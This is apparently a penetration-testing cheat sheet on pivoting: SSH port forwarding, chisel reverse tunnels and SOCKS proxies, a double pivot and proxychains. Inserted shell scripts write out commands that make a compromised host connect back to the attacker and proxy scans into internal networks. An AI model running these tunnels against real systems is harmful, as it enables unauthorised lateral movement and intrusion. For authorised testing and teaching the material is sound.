Pivoting

Network setup

The following sections rely on this network setup.

┌──────────────┐          ┌──────────────┐            ┌──────────────┐
│ attacking    │          │ compromised  │            │ target       │
│ machine      │          │ machine      │            │ machine      │
│ (local)      │          │ (pivot)      │            │ (target)     │
│              │          │              │            │              │
│  10.10.10.2 ◄┼──public──┼► 10.10.10.5  │            │              │
│              │          │              │            │              │
│              │          │  172.16.0.5 ◄┼──internal──┼► 172.16.0.10 │
│              │          │              │            │              │
└──────────────┘          └──────────────┘            └──────────────┘
Machine name          Short name   User
Attacking Machine     local        me
Compromised Machine   pivot        victim
Target Machine        target       -

SSH

Common options

option   description
-L       Forward connection (local port forwarding): listen on the local machine, deliver the connection through the SSH server
-R       Reverse connection (remote port forwarding): listen on the SSH server, deliver the connection through the SSH client
-D       SOCKS proxy (dynamic port forwarding): listen locally, open every proxied connection from the SSH server
-f       Go to the background right after authentication (combine with -N for a tunnel-only session)
-N       Only establish the connection, do not run a remote command

Forward connection (Local port forwarding)

Set up a local port forward to the target: a port on the attacking machine is delivered, through the pivot, to a port on the target.

Execute command
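An added example of the local forward, not a command from the original page: it uses the page's addresses (pivot 10.10.10.5 as user victim, target 172.16.0.10) and assumes a web service on the target's tcp/80. With DRY_RUN=1 (the default) it only prints each command; DRY_RUN=0 runs them.

```shell
#!/bin/sh
# Added example, not code from the original page: a local port forward through
# the pivot, using the page's addresses (pivot=10.10.10.5 as user "victim",
# target=172.16.0.10). Assumed: a web service on the target's tcp/80.
# DRY_RUN=1 (default) only prints each command; DRY_RUN=0 executes it via eval.
DRY_RUN="${DRY_RUN:-1}"
run() { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$1"; else eval "$1"; fi; }

# -L [bind:]lport:rhost:rport  listen on the attacking machine, deliver to
#                              rhost:rport as seen from the pivot
# -f -N                        background after authentication, no remote shell
# -o ExitOnForwardFailure=yes  exit instead of silently staying connected
#                              without the forward when lport is already taken
# Binding to 127.0.0.1 keeps the forward off the attacking machine's other
# interfaces; without it ssh also binds loopback unless GatewayPorts is set in
# ssh_config, so being explicit avoids surprises.
local_forward_cmd() {
    printf 'ssh -f -N -o ExitOnForwardFailure=yes -L 127.0.0.1:%s:%s:%s victim@10.10.10.5' "$1" "$2" "$3"
}

main() {
    run "$(local_forward_cmd 8080 172.16.0.10 80)"
    # ssh does not confirm the listener; check it is bound before relying on it
    run "ss -ltnp | grep ':8080 '"
    # the target's service now answers on our own loopback
    run "curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:8080/"
}
main
```

Run as `DRY_RUN=0 sh local_forward.sh` once the pivot's SSH credential works; if `ss` shows no listener on 127.0.0.1:8080, check the pivot's sshd for `AllowTcpForwarding no` before debugging anything else.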

Reverse connection (Remote port forwarding)

Because the pivot will connect back over SSH to our own machine, the credential we leave on it must not grant more than the tunnel itself. We therefore take the following precautions.

  1. Generate a new SSH key pair.

  2. Add the public key to authorized_keys with the following restrictions.

  3. Check the SSH server status.

  4. Start the SSH server (if it is not already running).

  5. Copy the private key over to the pivot. ⚠️ Normally we would never give away a private key; that is exactly why a new throwaway key pair is used here, and why its authorized_keys entry is restricted. Remove the entry again when the engagement is over. ⚠️

Set up a remote port forward from the pivot: a port on the attacking machine is delivered, through the pivot, to a port on the target.

Execute command (example)

Socks proxy (Dynamic port forwarding)

Set up a SOCKS proxy on the attacking machine. Every TCP connection made through it is opened from the pivot, so any port on any host the pivot can reach becomes reachable without a separate forward per port.

proxychains.conf (see also below)

Execute command (example)
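An added example for the dynamic forward and its proxychains.conf; these are not the page's own commands. It uses the page's addresses (pivot 10.10.10.5 as user victim, target 172.16.0.10); the SOCKS port 1080 and the scanned ports are arbitrary choices. DRY_RUN=1 (default) prints the commands, DRY_RUN=0 runs them.

```shell
#!/bin/sh
# Added example, not from the original page: ssh -D on the attacking machine plus
# a proxychains.conf that routes tools through it. Addresses from the page's
# network setup: pivot=10.10.10.5 (user "victim"), target=172.16.0.10.
# DRY_RUN=1 (default) prints each command; DRY_RUN=0 executes it via eval.
DRY_RUN="${DRY_RUN:-1}"
run() { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$1"; else eval "$1"; fi; }

# -D [bind:]port  ssh listens locally and speaks SOCKS4/5; every connection it
#                 accepts is opened from the pivot, so 172.16.0.0/24 is reachable.
socks_cmd() { printf 'ssh -f -N -o ExitOnForwardFailure=yes -D 127.0.0.1:%s victim@10.10.10.5' "$1"; }

# proxychains.conf for a single hop.
#   strict_chain  use the proxies in the listed order, fail if one is down
#   proxy_dns     resolve names through the proxy instead of leaking lookups
#                 to the attacking machine's resolver
#   timeouts      lower than the defaults so closed ports fail fast in scans
proxychains_conf() {
    printf 'strict_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks5 127.0.0.1 %s\n' "$1"
}

main() {
    run "$(socks_cmd 1080)"
    run "cat > ./proxychains.conf <<'EOF'
$(proxychains_conf 1080)
EOF"
    # nmap through SOCKS: only full TCP connects (-sT) are proxied, host discovery
    # is not (-Pn), and -n avoids name lookups. SYN/UDP scans would bypass the
    # proxy and report nonsense.
    run "proxychains -f ./proxychains.conf nmap -sT -Pn -n -p 22,80,445 172.16.0.10"
    run "proxychains -f ./proxychains.conf curl -s -o /dev/null -w '%{http_code}\n' http://172.16.0.10/"
    # curl can also talk SOCKS directly, which is handy to separate a broken
    # tunnel from a broken proxychains setup
    run "curl -s --socks5 127.0.0.1:1080 -o /dev/null -w '%{http_code}\n' http://172.16.0.10/"
}
main
```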

Socks proxy (reverse)

Chisel

A fast TCP/UDP tunnel over HTTP (GitHub: jpillora/chisel).

Port forwarding

Start server (local)

Start client (pivot)

Execute command (example)

SOCKS proxy

Start server (local)

Start client (pivot)

Note: <socks-port> defaults to 1080 if left out (R:socks is the same as R:1080:socks).

Execute command (example)
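An added example of both chisel setups above (a reverse port forward and a reverse SOCKS proxy), not code from the page or from the chisel project. It uses the page's addresses (local 10.10.10.2, pivot 10.10.10.5, target 172.16.0.10 with an assumed service on tcp/80); the server port 8000 and the credential `pivot:s3cret` are arbitrary. The `--auth` and `--fingerprint` options are chisel's own: the first stops anyone else who finds tcp/8000 on the attacking machine from pushing reverse tunnels into it, the second pins the server key that `chisel server` prints at startup so the pivot cannot be redirected to another server.

```shell
#!/bin/sh
# Added example, not from the page or the chisel project: chisel reverse port
# forward and reverse SOCKS over the page's network (local=10.10.10.2,
# pivot=10.10.10.5, target=172.16.0.10, assumed tcp/80). Server port 8000 and
# the credential are arbitrary. DRY_RUN=1 (default) prints local commands;
# DRY_RUN=0 executes them via eval. Pivot commands are only printed.
DRY_RUN="${DRY_RUN:-1}"
run()   { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$1"; else eval "$1"; fi; }
pivot() { printf 'pivot> %s\n' "$1"; }
AUTH='pivot:s3cret'

# Server (local). --reverse lets the client open listeners on the server side,
# which is what we need when the pivot can only connect outwards. --auth
# requires the credential from every client.
server_cmd() { printf 'chisel server -p %s --reverse --auth %s' "$1" "$AUTH"; }

# Client (pivot), port forward: R:lport:rhost:rport makes the server (local)
# listen on lport and the client (pivot) connect to rhost:rport.
# $1 = server fingerprint, $2 = server port, $3 = lport, $4 = rhost, $5 = rport
client_forward_cmd() {
    printf 'chisel client --auth %s --fingerprint %s 10.10.10.2:%s R:%s:%s:%s' "$AUTH" "$1" "$2" "$3" "$4" "$5"
}

# Client (pivot), reverse SOCKS: R:port:socks makes the server listen on
# 127.0.0.1:port as a SOCKS5 proxy whose connections leave from the pivot.
# $1 = server fingerprint, $2 = server port, $3 = socks port
client_socks_cmd() {
    printf 'chisel client --auth %s --fingerprint %s 10.10.10.2:%s R:%s:socks' "$AUTH" "$1" "$2" "$3"
}

main() {
    run "$(server_cmd 8000)"
    fp='<fingerprint printed by chisel server>'
    pivot "$(client_forward_cmd "$fp" 8000 8080 172.16.0.10 80)"
    pivot "$(client_socks_cmd "$fp" 8000 1080)"
    # both listeners live on the attacking machine once the clients connect
    run "ss -ltnp | grep -E ':(8080|1080) '"
    run "curl -s -o /dev/null -w '%{http_code}\n' http://127.0.0.1:8080/"
    run "curl -s --socks5 127.0.0.1:1080 -o /dev/null -w '%{http_code}\n' http://172.16.0.10/"
}
main
```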

Double pivot (via SOCKS proxies)

Start server (local)

Start client (pivot1)

Start another server (pivot1)

Start another client (pivot2)

Add the second proxy to proxychains.conf, after the first one (see proxychains below).

Execute command (example)

Verify

E.g.
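An added example of the double pivot and its verification, not the page's own commands. It uses the page's hosts (local 10.10.10.2; pivot1 10.10.10.5 with internal address 172.16.0.5; pivot2 is the page's target 172.16.0.10, now compromised) and assumes, hypothetically, that pivot2 has a second interface into a further network 10.20.0.0/24 with a host 10.20.0.10; ports 8000, 8001, 1080 and 1081 and the credential are arbitrary. The second chisel server is bound to pivot1's internal address with `--host` so it is not exposed on pivot1's public side, and the second SOCKS listener stays on pivot1's loopback: proxychains reaches it through the first proxy, whose connections are opened on pivot1, so `127.0.0.1 1081` in the second list entry means pivot1's loopback, not ours.

```shell
#!/bin/sh
# Added example, not from the original page: double pivot with two chisel
# reverse SOCKS proxies chained by proxychains. local=10.10.10.2,
# pivot1=10.10.10.5/172.16.0.5, pivot2=172.16.0.10. Assumed (hypothetical):
# pivot2 reaches 10.20.0.0/24, host 10.20.0.10. Ports and credential are arbitrary.
# DRY_RUN=1 (default) prints local commands; DRY_RUN=0 executes them via eval.
DRY_RUN="${DRY_RUN:-1}"
run() { if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$1"; else eval "$1"; fi; }
on()  { printf '%s> %s\n' "$1" "$2"; }
AUTH='pivot:s3cret'

# Hop 1: server on local, client on pivot1 -> SOCKS on local 127.0.0.1:1080,
# exiting on pivot1.
hop1_server_cmd() { printf 'chisel server -p 8000 --reverse --auth %s' "$AUTH"; }
hop1_client_cmd() { printf 'chisel client --auth %s 10.10.10.2:8000 R:1080:socks' "$AUTH"; }

# Hop 2: server on pivot1, bound to its internal address only, client on pivot2
# -> SOCKS on pivot1 127.0.0.1:1081, exiting on pivot2.
hop2_server_cmd() { printf 'chisel server --host 172.16.0.5 -p 8001 --reverse --auth %s' "$AUTH"; }
hop2_client_cmd() { printf 'chisel client --auth %s 172.16.0.5:8001 R:1081:socks' "$AUTH"; }

# strict_chain walks the list in order: connect to hop 1 on our loopback, ask it
# to CONNECT to 127.0.0.1:1081 (resolved on pivot1, where hop 1 exits, i.e. the
# hop-2 proxy), then ask hop 2 to CONNECT to the final destination.
chained_conf() {
    printf 'strict_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks5 127.0.0.1 1080\nsocks5 127.0.0.1 1081\n'
}

main() {
    run "$(hop1_server_cmd)"
    on pivot1 "$(hop1_client_cmd)"
    on pivot1 "$(hop2_server_cmd)"
    on pivot2 "$(hop2_client_cmd)"
    run "cat > ./proxychains.conf <<'EOF'
$(chained_conf)
EOF"
    # verify innermost first: hop 1 alone must reach pivot2's address
    run "curl -s --socks5 127.0.0.1:1080 -o /dev/null -w '%{http_code}\n' http://172.16.0.10/"
    # then the full chain into the third network
    run "proxychains -f ./proxychains.conf curl -s -o /dev/null -w '%{http_code}\n' http://10.20.0.10/"
    run "proxychains -f ./proxychains.conf nmap -sT -Pn -n -p 22,80,445 10.20.0.10"
}
main
```

Expect the chain to be noticeably slower than a single hop, and remember that every SOCKS connect adds a round trip on each hop; keep scans to a small, explicit port list.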

proxychains

A tool that forces any TCP connection made by a given application to go through a proxy such as TOR or any other SOCKS4, SOCKS5 or HTTP(S) proxy (GitHub: haad/proxychains).

Config file

Proxychains looks for its configuration in the following order; the first match wins:

  1. the file named in the environment variable PROXYCHAINS_CONF_FILE

  2. the file given with -f proxychains.conf

  3. ./proxychains.conf

  4. ~/.proxychains/proxychains.conf

  5. /etc/proxychains.conf

Run command via proxychains

Burp Suite

To use Burp Suite in this setup, just configure the socks proxy there.

Project options or User options → SOCKS Proxy → ☑️ Use SOCKS Proxy

  • SOCKS proxy host: 127.0.0.1

  • SOCKS proxy port: 1080

⚠️ Keep your browser pointing at Burp Suite's own listener as usual; the SOCKS setting is for Burp's outbound connections, not the browser's. ⚠️

Foxy Proxy

See Firefox extensions
